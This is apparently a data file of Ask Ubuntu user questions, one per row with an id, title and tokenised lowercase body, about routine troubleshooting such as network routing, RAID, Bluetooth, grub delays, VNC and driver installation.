271802	how do i force applications to use different internet connections ?	i have two data connections . one is a usb dongle with a high speed , limited data plan . the other is a broadband ( over wifi ) slower , but unlimited data plan , connection . i want certain applications such as software updates to use only the wifi connection for downloading whereas my browsers ( chromium , firefox ) to use the high speed connection . is it possible to force this selection on the applications ? also , in case one of the connections is not available , then everything should fall back on the other connection .
271809	how long should it take to create a raid 10 with 4 3tb disks ?	i am trying to create a raid 10 with four 3tb disks on ubuntu 12.10 with mdadm . i was wondering how long should it take to create the raid . right now when i look at /proc/mdstat it is showing 19107 minutes . that is more than 13 days . is this normal ? are there any tools that can achieve the same result faster ? my boot drive is different from the disks in the enclosure . i am using mac mini 6,1 with ubuntu 12.10 and external usb 3.0 raid enclosure . i have western digital 3tb disks . thank you for your help .
271816	strange jdownloader ppa package behavior	trying to install jdownloader like on this page sudo add-apt-repository ppa : jd-team/jdownloader sudo apt-get update sudo apt-get install jdownloader-installer after commands above i get following screen seems well done , but when i search for jdownloader with unity , there is no icon in search results . i removed completely this package with the help of synaptic soft manager several times , and reinstalled . result is same what i 'm missing ?
271822	bluetooth not detect others device hp mini 110-3000	bluetooth can not see any of the device and also when looking for computer bluetooth ( visible ) is not seen . how do i fix this . i have a lot of time searching on google to find out whether anyone else has the same problem as me . if you see here i am trying to make sure whether the computer is able to detect my bluetooth by typing lsusb bus 001 device 003 : id 1fea:0047 bus 003 device 002 : id 0a12:0001 cambridge silicon radio , ltd bluetooth dongle ( hci mode ) bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bluetooth computer it can detect this and i tried to wear the application `` system testing '' and found this bluetooth device works well whereas this it really does not work well audio/alsa_record_playback_external skipped audio/alsa_record_playback_usb skipped audio/playback_auto skipped audio/alsa_record_playback_internal skipped benchmarks/disk/hdparm-read_sda skipped benchmarks/disk/hdparm-cache-read_sda skipped bluetooth/detect-output passed camera/detect skipped camera/still skipped camera/display skipped and this problem has persisted from ubuntu 10.04 lts until now i was using 12.10 answer to this problem is still not answered yet when i try to detect where this bluetooth maker i find it is not made ââfrom the cambridge silicon radio bluetooth dongle , but from azurewave technologies , inc.. i trace it using the mac address http : //hwaddress.com/ ? q= % 0974 % 3af0 % 3a6d % 3a66 % 3a98 % 3aae + so can i conclude here that it is a bug .
271825	mouse text selection to paste buffer using middle click	background i have a logitech marble mouse trackball , with its scrolling ability configured as follows : # ! /bin/bash dev= '' logitech usb trackball '' we= '' evdev wheel emulation '' xinput set-int-prop `` $ dev '' `` $ we button '' 8 8 xinput set-int-prop `` $ dev '' `` $ we '' 8 1 this allows me to hold down the small left-button and scroll by rolling the trackball up and down , with side-to-side motions having no effect . this is a clean install of xubuntu 12.04 lts running xfce . problem using kubuntu ( and many other desktop environments ) , i was able to : select text with the mouse ( either by dragging the selection or double-/triple-clicking words ) . middle-click ( emulated as the small right-button ) to paste in another window ( or the same window ) . i have tried to re-enable the behaviour using : http : //who-t.blogspot.ca/2011/04/gnome-30-middle-mouse-button-emulation.html marble mouse middle click fail in 12.04 https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-input-evdev/+bug/874237/comments/13 running gsettings set org.gnome.settings-daemon.peripherals.mouse middle-button-enabled true returns no such schema 'org.gnome.settings-daemon.peripherals.mouse ' . the dconf-editor tool does not show org : :gnome : :settings-daemon : :peripherals : :mouse . the closest i could find is org.gnome.desktop.a11y.mouse , but it does not have a setting for middle-button-enabled . question how do i enable `` middle-click '' for the trackball so that the small right-button performs a paste of the copy buffer ?
271826	make wubi installation quicker	wubi installation needs to download ubuntu-12.04-wubi-amd64.tar.xz , and this process is extremely slow . i can download this file from http : //releases.ubuntu.com/precise/ faster . how can i use a installer disk i downloaded myself in the installation ?
271829	problems with internet connection after installing and updating ubuntu 12.10	i have just installed ubuntu 12 on my notebook , and when want to browse on internet , i am getting the following error : '' firefox ca n't find the server at start.ubuntu.com '' when i installed the ubuntu , i was connected to internet and everything was ok. after installation i did some updates and afterwards i am getting this message . i tied to follow the same question on this forum , and tried all advices in comments with no result.duplicate question is not closed . want to connect with wifi if you need more technical information , e.g . from ifconfig , just let me know . thank you edit : using ubuntu 12.10 network indicator - indicating no wifi connection at all after click - can update/modify existing network connections typing in terminal : ping google.com , = > getting message : unname host google.com
271831	where can i download the deb installer of myunity ?	i 'm an ubuntu 12.04 complete offline user . i need myunity tool to change the fonts of ubuntu . can anyone give me the offline installer ?
271836	restore laptop to manufacturer 's pre-installed version of ubuntu 12.04 lts	i recently bought a hp envy 6-1215tx that came with ubuntu 12.04 lts pre-installed . i have since cleaned my ssd and hdd and installed 12.10 and windows 8 . unfortunately my laptop 's wifi is n't supported by the normal ubuntu releases . the only version that will work is the pre-installed version . i do n't have a recovery disk . can the hp version of 12.04 be downloaded ? or is there something i can do in the terminal to restore it ? i did n't do anything to prepare a system recovery before i cleaned the original version off the hard drive ( i assumed that i did n't need to as ubuntu is opensource - i was unaware my computer had a special version ) .
271837	how to use byobu keybindings in a nested remote session ?	i 'm using byobu ( with tmux , inside of gnome-terminal ) and i have a problem with its keybindings ( which i probably fail to understand ) . i launch byobu , open a few windows then , from one of these windows , i ssh into another machine and launch byobu there . no matter if i press ctrl-c or ctrl-a-c , i 'm not sure how to create and switch between windows in this remote session . note : if i enter shift-f12 i can switch between windows using the function keys in the remote session but this is less than ideal as i also need to switch between windows in the main session . any ideas ? thanks in advance for your help .
271839	ultra-low-latency audio support on ubuntu for phones	does ubuntu for phones support ultra-low-latency audio and are we going to be able to use apps like amplitube ?
271840	how to use plop boot manager to boot from usb in linux ?	i failed to upgrade from 12.04 to 12.10 , so i decide to make a fresh install of 12.10 . my old computer does n't support boot from usb , and its cd-rom is broken . i know plop boot manager can make my computer boot from usb . i know how to use it in windows , and i did use it when i tranfer from win-xp to ubuntu 12.04 . but now , i do n't know how to use it under linux . as far as i know , despite of the lengthy documentation , using plop to boot from usb under windows is as simple as double clicking a bat file . but doc for linux is not that straitfoward and contains daunting terminologies such as lilo for a linux newbie . what makes it worse is that i 'm not a native english speaker . so could someone show me a brief and concise instruction how to boot from usb ?
271846	triple monitors on hybrid video system geforce+intel	i use lenovo ideapad z580a with hybrid video : geforce+intel with ubuntu 12.10 x64 ukrainian . it has internal display and two outputs : hdmi and vga . when i connect third display to vga all displays go black . pressing alt+backspace and login causes output to two displays : internal and vga . system settings - > displays ( or monitors - i have ukrainian interface ) shows three displays : two are on , one ( dvi ) is off . turning dvi on and pressing apply causes an error : can not set configuration of controller crtc 65 . bios setting is optimus ( two video cards ) . driver for geforce is nouveau . with best regards . viktor .
271849	ubuntu 12.10 stuck on black screen with a lot of text	i put ubuntu 12.10 x64 installation on my usb using universal usb installer . then , i reboot the computer and select to boot from the usb . i get the keyboard logo , and i press space and select language . then , i press f6 for more options and select `` nomodeset '' . i pressed enter and waited for half a minute . i got this : what am i doing wrong ? what should i do to make it work ? note : i have a hp pavilion g7 1303 which currently has windows 8 installed ( was n't preinstalled , the laptop 's older than windows 8 ) .
271850	why do iwork documents appear as folders on ubuntu one and ubuntu ?	i 'm uploading to ubuntu one part my mac drive and there are some files from iwork that are uploaded as folders . so instead of myfile.pages i get a folder with the name myfile.pages on the ubuntu drive . has any one had the same issue ? how can i solve this ?
271858	help with configuring gateway - ( newbe )	i 'm trying to setup a gateway/firewall for our internet site . my system properties are : ubuntu 12.04 i 've install webmin 1.620 i have 2 nic ( eth0 , eth1 ) eth0 will be connected to the internet and will accept incoming traffic for our https site . eth1 will be connected to the internal switch and will forward the incoming traffic from eth0 to the apache server on that is connected to the same switch . what do i need to configure in order to make it work ? where to start ?
271861	key needs to be typed two times to display	i am using ubuntu 12.04 and keyboard layout english ( us , alternative international ) . when i press the key â´ or â¨ ( single quote & double quote ) key , it does not output when pressed first time , it needs to be pressed second time , then only it displays . same problem with ~ key , it also needs to be pressed two times . no any problem with other keys . how to rectify this strange problem ? thanks in advance !
271865	huge difference beetween 2 versions of ubuntu 12.04	i have installed ubuntu 12.04 lts on my laptop ( now through updates i have 12.04.2 ) and i installed 12.04.2 lts on my girlfriend 's laptop and they have different kernels . while mine has kernel version 3.2 , my girlfriend 's has 3.5 . i see here the 3.5 does n't have a version for precise.is it a good/bad thing ? should i upgrade to kernel 3.5 myself ?
271866	path variables dont work with sudo command	if i put a root into my path variable like so : path= $ path : $ home/pear/bin/ i can then access the programs in my pear bin . works as expected , but while i can do this : phpunit -version phpunit being a program that resides in my pear bin , i can not do this : sudo phpunit -version as i get the following error : sudo : phpunit : command not found does the sudo command not have universal access ?
271867	ubuntu does not find connection to wireless router	i 've installed ubuntu 12.10 , but when i click on : wireless connections my router settings could n't not be found . does anyone has a solution for this ? i can get connection when i start up a wired connection !
271870	how can i keep alive my ftp connection ( over curlftpfs ) ?	i have curlftpfs on my ubuntu 12.10 laptop , but my wifi router is bad and drops ftp connections after 30 seconds of inactivity . is there a keep-alive setting with curlftpfs or if not are there any other options ? i have tried the built in connect to server gui , but your server disappears after reboot . sshfs is no good either , i need to mount to a particular directory ( the server is my web host ) , otherwise it 's a pain to find my content . google has n't yielded any answers either .
271871	lubuntu unable to login with gui . coloured lines\bars	i am new to linux . i successfully installed lubuntu 12.10 alternate version `` lubuntu-12.10-alternate-i386 '' . i checked the .iso file using `` winmd5sum '' and it was proper . i burned it and checked error for disk , even that was proper . after installation , from grub i went to ubuntu , then i got this weird screen full of colored bars . it did n't make any sense . i tried ctrl+alt+f1 and logged onto it , then ctrl+alt+f7 . still the same screen . for more details http : //ubuntuforums.org/showthread.php ? t=2128715
271873	unable to assign qstring to qquickitem* with qt.resolvedurl	i have the following code : tabs { tab { id : financialdetailstab title : i18n.tr ( `` financial details '' ) page : qt.resolvedurl ( `` financialdetails.qml '' ) } tab { id : monthlybudgettab title : i18n.tr ( `` monthly budget '' ) page : qt.resolvedurl ( `` monthlybudget.qml '' ) } tab { id : annualbudgettab title : i18n.tr ( `` annual budget '' ) page : qt.resolvedurl ( `` annualbudget.qml '' ) } tab { id : savingsgoalstab title : i18n.tr ( `` savings goals '' ) page : qt.resolvedurl ( `` savingsgoals.qml '' ) } } which is generating the following errors : unable to assign qstring to qquickitem* unable to assign qstring to qquickitem* unable to assign qstring to qquickitem* unable to assign qstring to qquickitem* on the lines where qt : :resolvedurl is being used . the tabs component is a part of the ubuntu sdk , and not qt quick , and the only example of it 's use does n't provide much insight into the problem . i 've added the exact same lines as properties of the mainview , outside of the tabs component , and the problem has not been evident there , leading me to believe the issue lies with the ubuntu component . all the files exist and sit at the same level in the project as this one . what am i doing wrong here ?
271881	dell latitude does n't get past dell splash screen	i got this new dell latitude e6420 , i installed ubuntu 12.10 which works fine except for one issue . after i press the power button it hangs at a dell splash screen and does n't do anything . if i press f12 ( before it hangs ) to get in the boot selection and select one of the uefi boot options all is well . the problem of course is that it 's a bit annoying to do this every time i boot . i ran boot-repair , but that did n't help ( see http : //paste.ubuntu.com/5643012/ ) see http : //imgur.com/kivrwpc , px2jwxd , lq3cde7 for my bios settings / boot menu . the ubuntu boot option is the one that appeared after i initially installed ubuntu , the other one appeared after running boot repair . i also made some boot options myself and pointed them to the correct grub file , but they had exactly the same issue . i have hd encryption on , so maybe this has something to do with it , although the decryption comes after the boot menu , so it might be irrelevant . also ubuntu is the only os , so no dual booting is going on .
271882	bricked dell after installing	i just created a disaster i would not have thought possible . i used a usb stick to install ubuntu 12.04 lts alongside windows 7 on a dell inspiron 560 . the install went well , except that grub did n't install . no problem ; i rebooted to the usb stick and followed the procedure to reinstall grub . upon my next boot , i got the grub menu and could select ubuntu or windows ( yay ! ) but ubuntu locked up during boot ( boo ! ) the problem is , now rebooting achieves nothing : the dell logo screen does n't appear , so i have no access to boot options , and grub never appears . i ca n't get into the setup screen , i ca n't select a different boot device -- nothing ! there 's no video signal at all upon boot , according to my monitor . how could a failed boot of ubuntu cause my computer to refuse to ever output video ?
271886	how can i get summary and description of schema using gsettings	i prefer to use gsettings over dconf-editor because dconf-editor lacks of command-line options to go to a schema directly ( eg . i have to do `` org - click - gnome -click - settings-daemon - click - plugins - click - power - click ) . one problem using gsettings is that i can not see the `` description '' and `` summary '' fields that i get in dconf-editor . is there any way to get these ? best , j端rgen
271887	warning : gdb : failed to set controlling terminal : operation not permitted	i 'm using code-blocks ide in my ubuntu 12.10.but when i 'm trying to debug any project , i got the following warning : warning : gdb : failed to set controlling terminal : operation not permitted what should i do now ?
271898	what is grub doing while it takes 9 minutes to start booting the kernel ?	lately ( at least the last 2 time i turned the pc on ) i noticed grub takes forever to boot . i timed almost 9 minutes between the bios messages go away and the kernel log appears on screen . the question is how can i know what grub is doing or waiting ? how can i check grub is ok ? a few days ago i removed the splash screen so i see the text log on every boot . most of the times it is fast and normal . during those 9 minutes the monitor receives signal , but it is just a black screen . numlock does not respond , the whole thing appears to be frozen , but it is not . i have have / on a software raid1 since 2009 at least . the raid is reported healthy . during those minutes there 's some minor hard disk activity in the first minute . hard drive smart data is healthy . shutdown the day before was normal . i have had all ubuntu versions installed in this computer since 8.04 . i have 12.10 installed since october . there 's nothing new in this computer , no new hard drives , no changes in the bios settings . there 's no grub log afaik and the kernel log is not interesting because it says the kernel booted in 28 seconds [ phenomx4 kernel : [ 28.825313 ] vboxpci : iommu not found ( not registered ) ] so the 9 minutes are before the kernel started . *update : march 27th * i found the problem , but i still do n't know the cause . the problem was /boot/grub/grub.cfg was 11.6 mb and it had entries like this one repeated many many times with slight variations . grub was choking on such a big file to create its menu . menuentry 'ubuntu 12.10 ( 12.10 ) ( en /dev/sda1 ) ( en /dev/sda1 ) ( en /dev/sdb1 ) ( en /dev/sda1 ) ( en /dev/sda1 ) ( en /dev/sda1 ) ( en /dev/sda1 ) ( en /dev/sda1 ) ( en /dev/sda1 ) ( en /dev/sda1 ) ( en /dev/sda1 ) ( en /dev/sda1 ) ( en /dev/sda1 ) ( en /dev/sda1 ) ( en /dev/sda1 ) ( en /dev/sda1 ) ' -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'osprober-gnulinux-/vmlinuz -- 73e06880-5f46-4493-aaef-23fa4ad138f6 ' { insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 -- hint='hd0 , msdos1 ' 73e06880-5f46-4493-aaef-23fa4ad138f6 else search -- no-floppy -- fs-uuid -- set=root 73e06880-5f46-4493-aaef-23fa4ad138f6 fi linux /vmlinuz root=/dev/sda1 initrd /initrd.img } still do n't know why that file grew so much ? update march 28th a big chunk of the menu entries is generated by /etc/grub.d/30_os-prober . line 223 : # # # begin /etc/grub.d/30_os-prober # # # ... line 175174 : # # # end /etc/grub.d/30_os-prober # # # grub.cfg has 175191 lines , so that script represents 99 % of the 11.6 mb in the file .
271900	when i use the universal usb trouble	when i use the universal usb installer , and it 's extracting the files . i get about 200 errors . i have reinstalled ubuntu twice . it still gives me problems . i try using it anyways to boot to my flashdrive and i just get a screen saying missung default or ui configuration directive . i have tried every solution i have found on the internet , and nothing works . even renaming the files . please help , i would really like to start using ubuntu asap . thank you !
271901	console shows on shutdown/logout	when i shut down , i will see a black screen with console text for about one second . after about one second , it goes to the splash screen and shuts down normally . i see the same console when i am log out . is this normal ? i am running 12.04 .
271904	oracle java 7 on linux powerpc	i give up trying to figure this one out on my own . the information on this website : http : //www.yellowdog-board.com/viewtopic.php ? t=2935 and on this one : http : //kapsulax.blogspot.jp/2008/08/java-plugin-under-linux-ppc.html is way outdated . ibm no longer creates rpm files for installing the linux powerpc version of oracle java . i 've got my reasons for wanting to switch from openjdk to oracle 's java but this is almost impossible to do on linux for powerpc . ibm as we all know is a huge supporter of the powerpc architecture and actually has some kind of version of java which supposedly runs on linux for powerpc but there are zero instructions on how to get it installed . the files available are .bin files which after running seem to extract something into my /tmp folder which seems to have java binaries but i do n't think these binaries are ubuntu compatible because they do n't work o_o and the javac binary is nowhere to be found . anyone know where i can get a .deb or .rpm of java 6 or 7 the jre and jdk for linux powerpc ? update march 23 , 2013 i get this error on install and ca n't figure out where to go from here ./ibm-java-sdk-7.0-4.0-ppc-archive.bin preparing to install ... extracting the jre from the installer archive ... unpacking the jre ... extracting the installation resources from the installer archive ... configuring the installer for this system 's environment ... launching installer ... unhandled exception type=illegal instruction vmstate=0x00000000 j9generic_signal_number=00000010 signal_number=00000004 error_value=00000000 signal_code=00000001 handler1=0fb25d60 handler2=0fa53d60 r0=5fac9dec r1=4882ef40 r2=48839930 r3=4b845488 r4=5fac9dec r5=001ed8b5 r6=2f21e3dc r7=6f1d6f66 r8=5fac9dec r9=6f1d6f66 r10=2f21e3dc r11=0fb140d4 r12=4b845488 r13=4894bf00 r14=48980ea0 r15=00000000 r16=4bf1a1a5 r17=4bedef48 r18=0fbd88b0 r19=0000000c r20=4bea43d4 r21=48980edc r22=489b8300 r23=00000000 r24=00000000 r25=0fbd62f0 r26=4894bf78 r27=4bedd698 r28=000e0002 r29=0f2cd75c r30=0fbd7fe0 r31=ffffff00 nip=0f2963e0 msr=0208f932 orig_gpr3=00000017 ctr=0f276398 link=0f2765ac xer=20000008 ccr=28006222 mq=00000000 trap=00000700 dar=4bf1a000 dsisr=42000000 result=00000000 module=/tmp/install.dir.27614/linux/resource/jre/lib/ppc/default/libjclse7b_26.so module_base_address=0f228000 target=2_60_20130205_137358 ( linux 3.2.0-4-powerpc ) cpu=ppc ( 1 logical cpus ) ( 0x3ef21000 ram ) -- -- -- -- -- - stack backtrace -- -- -- -- -- - ( 0x0fa40f4c [ libj9prt26.so+0x14f4c ] ) ( 0x0fa52840 [ libj9prt26.so+0x26840 ] ) ( 0x0fa40ff8 [ libj9prt26.so+0x14ff8 ] ) ( 0x0fa411cc [ libj9prt26.so+0x151cc ] ) ( 0x0fa40bd4 [ libj9prt26.so+0x14bd4 ] ) ( 0x0fa52840 [ libj9prt26.so+0x26840 ] ) ( 0x0fa40c8c [ libj9prt26.so+0x14c8c ] ) ( 0x0fb27008 [ libj9vm26.so+0x1f008 ] ) ( 0x0fb264cc [ libj9vm26.so+0x1e4cc ] ) ( 0x0fa52840 [ libj9prt26.so+0x26840 ] ) ( 0x0fb25ef4 [ libj9vm26.so+0x1def4 ] ) ( 0x0fa53f14 [ libj9prt26.so+0x27f14 ] ) __kernel_sigtramp_rt32+0x0 ( 0x00100370 ) ( 0x0fb4ecf0 [ libj9vm26.so+0x46cf0 ] ) ( 0x0f23fe60 [ libjclse7b_26.so+0x17e60 ] ) ( 0x0fb74e80 [ libj9vm26.so+0x6ce80 ] ) ( 0x0fb75088 [ libj9vm26.so+0x6d088 ] ) ( 0x0fb30558 [ libj9vm26.so+0x28558 ] ) ( 0x0fb1a608 [ libj9vm26.so+0x12608 ] ) ( 0x0fb449d8 [ libj9vm26.so+0x3c9d8 ] ) ( 0x0fb3bf70 [ libj9vm26.so+0x33f70 ] ) ( 0x0f286fdc [ libjclse7b_26.so+0x5efdc ] ) ( 0x0f291980 [ libjclse7b_26.so+0x69980 ] ) j9vmdllmain+0x1c0 ( 0x0f291ba0 [ libjclse7b_26.so+0x69ba0 ] ) ( 0x0fb6041c [ libj9vm26.so+0x5841c ] ) ( 0x0fb9f088 [ libj9vm26.so+0x97088 ] ) ( 0x0fb60198 [ libj9vm26.so+0x58198 ] ) ( 0x0fb5b700 [ libj9vm26.so+0x53700 ] ) ( 0x0fa52840 [ libj9prt26.so+0x26840 ] ) ( 0x0fb5a728 [ libj9vm26.so+0x52728 ] ) jni_createjavavm+0xa4 ( 0x0fb40e24 [ libj9vm26.so+0x38e24 ] ) jni_createjavavm+0xb14 ( 0x0fc18bb4 [ libjvm.so+0xbbb4 ] ) jni_createjavavm+0x2e0 ( 0x0fd7c6a0 [ libjvm.so+0xd6a0 ] ) ( 0x0ff8f4b8 [ libjli.so+0x44b8 ] ) ( 0x0ffccabc [ libpthread.so.0+0x7abc ] ) clone+0x84 ( 0x0fe9ba64 [ libc.so.6+0xf4a64 ] ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - jvmdump039i processing dump event `` gpf '' , detail `` '' at 2013/03/25 13:14:09 - please wait . jvmdump032i jvm requested system dump using '/tmp/install.dir.27614/core.20130325.131409.27614.0001.dmp ' in response to an event jvmdump010i system dump written to /tmp/install.dir.27614/core.20130325.131409.27614.0001.dmp jvmdump032i jvm requested java dump using '/tmp/install.dir.27614/javacore.20130325.131409.27614.0002.txt ' in response to an event jvmdump010i java dump written to /tmp/install.dir.27614/javacore.20130325.131409.27614.0002.txt jvmdump032i jvm requested snap dump using '/tmp/install.dir.27614/snap.20130325.131409.27614.0003.trc ' in response to an event jvmdump010i snap dump written to /tmp/install.dir.27614/snap.20130325.131409.27614.0003.trc jvmdump013i processed dump event `` gpf '' , detail `` '' . for some reason ... i wonder if the problem is n't related to how a couple years before , ibm provided rpms to install these binaries on redhat machines . so it was easy with `` alien '' to convert the rpm to a .deb and install it from there . now they are just executable .bin files and most likely configured for rhl machines . wondering if i have to convert them somehow to work on debian based machines . no ? update march 25 , 2013 after trying the approach on this site : http : //ubuntuforums.org/showthread.php ? t=1116368 i get stuck at the following error . fakeroot make-jpkg ibm-java-sdk-6.0-0.0-linux-ppc.tgz creating temporary directory : /tmp/make-jpkg.cgvm3tioqh loading plugins : /usr/share/java-package/common.sh /usr/share/java-package/j2re.sh /usr/share/java-package/j2sdk-doc.sh /usr/share/java-package/j2sdk.sh /usr/share/java-package/j2se.sh /usr/share/java-package/oracle-j2re.sh /usr/share/java-package/oracle-j2sdk-doc.sh /usr/share/java-package/oracle-j2sdk.sh detected debian build architecture : powerpc detected debian gnu type : powerpc-linux-gnu no matching plugin was found . removing temporary directory : done the directory in /tmp that it says is created , disappears and the .deb file is not created . it amazes me that ibm does not provide install instructions on their site ... who is supposed to be able to use these files ! ? ! ?
271913	unable to login after installing video card	i have been using ubuntu for a while . i changed the video card ( to have multiple monitors ) and after fumbling with it i obviously screwed up something . net result ubuntu boots fine but when i try to login to my account it just returns me to the login prompt after some flickering . now if i login from any other account ( my wife 's for example ) it works fine so something in my account is messed up . is there any way to reset the `` control '' files on my account so things work again ? any help greatly appreciated cheers gino
271916	bsnl 3g datacard installation	i 'm trying to install mobile_partner software in ubuntu 12.04 . my problem is that i can use my huawei modem for accessing internet through network manager . but i cant use the mobile partner software in linux . i tried to install the mobile partner software . here are the step i followed . copy the linux folder from data-card to home directory . switch to the root account . running the install script but when i run the install script . i got following error ; local path is : /usr/local/mobile_partner installing mobile partner ... ./install : line 495 : ./mobilepartner_distrib : no such file or directory cp : can not create regular file `./rt/lib/ ' : no such file or directory cp : can not create regular file `./rt/lib/ ' : no such file or directory ln : failed to create symbolic link `/usr/local/mobile_partner/rt/lib/fonts/fallback ' : no such file or directory installing driver ... /usr/local/mobile_partner/driver/ndis_driver usage : modinfo [ -0 ] [ -f field ] [ -k kernelversion ] [ -b basedir ] module ... prints out the information about one or more module ( s ) . if a fieldname is given , just print out that field ( or nothing if not found ) . otherwise , print all information out in a readable form if -0 is given , separate with nul , not newline . if -b is given , use an image of the module tree . error : removing 'cdc_ether ' : no such file or directory error : removing 'usbnet ' : no such file or directory error : removing 'hw_cdc_driver ' : no such file or directory make -c src/ clean make [ 1 ] : entering directory `/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src' rm -rf *.o *.ko *~ core* .dep* . *.d . *.cmd *.mod.c *.a *.s . *.flags .tmp_versions module.symvers modules.symvers *.order /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/add_header.sh `` clean '' `` /lib/modules/3.2.0-39-generic/build/include/linux/usb '' rmmod -f hw_cdc_driver error : removing 'hw_cdc_driver ' : no such file or directory make [ 1 ] : *** [ clean ] error 1 make [ 1 ] : leaving directory `/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src' make : *** [ clean ] error 2 make -c src/ modules make [ 1 ] : entering directory `/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src' # /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/add_header.sh `` modules '' `` /lib/modules/3.2.0-39-generic/build/include/linux/usb '' make -c /lib/modules/3.2.0-39-generic/build subdirs=/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src modules make [ 2 ] : entering directory `/usr/src/linux-headers-3.2.0-39-generic' cc [ m ] /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.o /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c : in function ‘rx_tlp_parse’ : /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c:601:7 : warning : iso c90 forbids mixed declarations and code [ -wdeclaration-after-statement ] /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c : at top level : /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.c:1986:2 : error : unknown field ‘ioctl’ specified in initializer make [ 3 ] : *** [ /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/hw_cdc_driver.o ] error 1 make [ 2 ] : *** [ _module_/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src ] error 2 make [ 2 ] : leaving directory `/usr/src/linux-headers-3.2.0-39-generic' make [ 1 ] : *** [ modules ] error 2 make [ 1 ] : leaving directory `/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src' make : *** [ modules ] error 2 make -c src/ install make [ 1 ] : entering directory `/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src' # install -m 744 -c hw_cdc_driver.o /lib/modules/3.2.0-39-generic/kernel/drivers/usb/net # depmod -a # modprobe hw_cdc_driver /usr/local/mobile_partner/driver/ndis_driver/ndis_src/src/add_header.sh `` install '' modprobe hw_cdc_driver fatal : module hw_cdc_driver not found . make [ 1 ] : *** [ install ] error 1 make [ 1 ] : leaving directory `/usr/local/mobile_partner/driver/ndis_driver/ndis_src/src' make : *** [ install ] error 2 install ndis driver failed . the compiling environment is not all ready . please check gcc , make and kernel buid ( /lib/modules/3.2.0-39-generic/build ) to be all installed ? now please enter any key to finish other installations . after pressing key : ndis is disabled , and only modem can be used . addrunlevel=/etc/rc5.d `/etc/rc5.d/s99runhwactivator ' - > `/etc/init.d/runhwactivator' `/etc/rc5.d/k10runhwactivator ' - > `/etc/init.d/runhwactivator' addrunlevel=/etc/rc2.d `/etc/rc2.d/s99runhwactivator ' - > `/etc/init.d/runhwactivator' `/etc/rc2.d/k10runhwactivator ' - > `/etc/init.d/runhwactivator' addrunlevel=/etc/rc3.d `/etc/rc3.d/s99runhwactivator ' - > `/etc/init.d/runhwactivator' `/etc/rc3.d/k10runhwactivator ' - > `/etc/init.d/runhwactivator' addrunlevel=/etc/rc4.d `/etc/rc4.d/s99runhwactivator ' - > `/etc/init.d/runhwactivator' `/etc/rc4.d/k10runhwactivator ' - > `/etc/init.d/runhwactivator' cp : can not create regular file `/etc/acpi/suspend.d/ ' : not a directory chmod : can not access `/etc/acpi/suspend.d/010-huawei-suspend.sh ' : no such file or directory the output of lsusb command is following : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 04f2 : b159 chicony electronics co. , ltd bus 003 device 002 : id 03f0:231d hewlett-packard bus 002 device 004 : id 12d1:1506 huawei technologies co. , ltd. e398 lte/umts/gsm modem/networkcard i already installed linux -header , ndis from synaptic but i 'm still stuck . i do n't know what to do please give me some suggestion .
271917	updates for ubuntu 11.10	i recently upgraded ubuntu 11.10 to ubuntu 12.04 lts after but after noticing degraded performance and several bugs in 12.04 . i downgraded back to 11.10 which now zips along quite fine as before , on my machine . however what i would like clarified is that after support for 11.10 is stopped in april , if i decide to do a clean install of 11.10 on a machine , will the update manager still offer to install the ( last ) updates and security fixes that were made for 11.10 or will it simply offer to upgrade to 12.04 lts . if i add other ppa 's such as google google chrome and spotify etc . will/can they still offer upgrades for their software ?
271920	remote connection from wp8 to ubuntu 12.04	is it possible to establish something like a remote desktop connection from a windows phone 8 based phone to ubuntu ? i just migrated my desktop from windows 7 to ubuntu 12.04 . so i 'm pretty much an ubuntu newby . basically , i would like to kick off some scripts for calculating stuff ( physics ) and check on the results remotely .
271924	how to connect on vnc client to non-default display ( :1 )	context i 'm working with a friend to run a virtual machine on a remote server and connect to it using vnc . as he already have one vm on the :0 display , he put mine on the :1 display . issue i tried to connect to the machine using various vnc client ( remmina , tightvnc , krdc ) and none seems to be able to connect to a display other than :0 . n.b . : i also tried virt-manager but it seems the gentoo server does n't have the right version of netstat .
271926	how do i use ubuntu one to keep backup files online ?	if i upload a file and i want it to remain on server , yet delete it from my computer . how can i do that ? i want to access the file over internet only ! i am thinking about mails or drafts . or something like dropbox . thanks in advance
271930	how can i see ubuntu file system , installed on sdcard , from android	i installed ubuntu 12.04 32bit bootable on my sd card ( 16gb ) giving 6gb for ubuntu ( 4 for documents ) , 10 to android ( fat32 - boot flags ) . how can i open ubuntu files from android device ? ubuntu folder to access : /home/desktop/download i have rooted htc sensation .
